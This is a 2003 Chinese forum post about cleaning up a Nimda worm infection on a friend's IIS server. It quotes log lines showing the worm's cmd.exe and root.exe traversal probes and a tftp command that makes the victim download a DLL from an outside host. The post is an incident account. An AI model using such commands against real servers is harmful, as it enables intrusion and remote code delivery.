NIMDA病毒接触

[这个贴子最后由damnyou在 2003/07/17 06:05pm 第 10 次编辑]


   在帮朋友做机子的时候因为他的机子染了病毒。
   IIS还开着的，也是默认设置，那怎么能不染病毒呢。
   于是我就看了看日志。其中有这么一段：
2003-06-29 04:25:37 IP - ip 80 GET /scripts/root.exe /c+dir 200 -
2003-06-29 04:27:15 IP - ip 80 GET /MSADC/root.exe /c+dir 403 -
2003-06-29 04:27:20 IP - ip 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-06-29 04:27:26 IP - ip 80 GET /d/winnt/system32/cmd.exe /c+dir 200 -
2003-06-29 04:36:43 IP - ip 80 GET /scripts/root.exe /c+tftp%20-i%20IP%20GET%20cool.dll%20httpodbc.dll 502 -
   IP是小日本的，ip是我朋友的。估计就是中NIMDA了。
   于是就好解决了，三下五除二就搞定。
   我所关注的是这个IP。于是我就上去看了看。原来是默认的页面。估计也是中毒了。我打开网页后出现如图这个页面。
   看见了吗？这个隐藏着的页面就是下载病毒体“README.EML”的。结果估计是那个机子把病毒杀掉了的缘故，下载出现了问题。所以本来会一闪而过的，结果就总停留在那儿了。
   然后我们打开这个机子默认的页面看了看，马上就找到了病毒修改默认网页留下的恶意代码

   这一段是在离本身正常的网页代码很远的地方被病毒添加上去的（估计是怕被发现）。
    可惜我现在没这个“readme.eml”的代码。以后有空发上来大家看看。

你不错啊,向你学习,一听你说话的口气就知道是..........高手!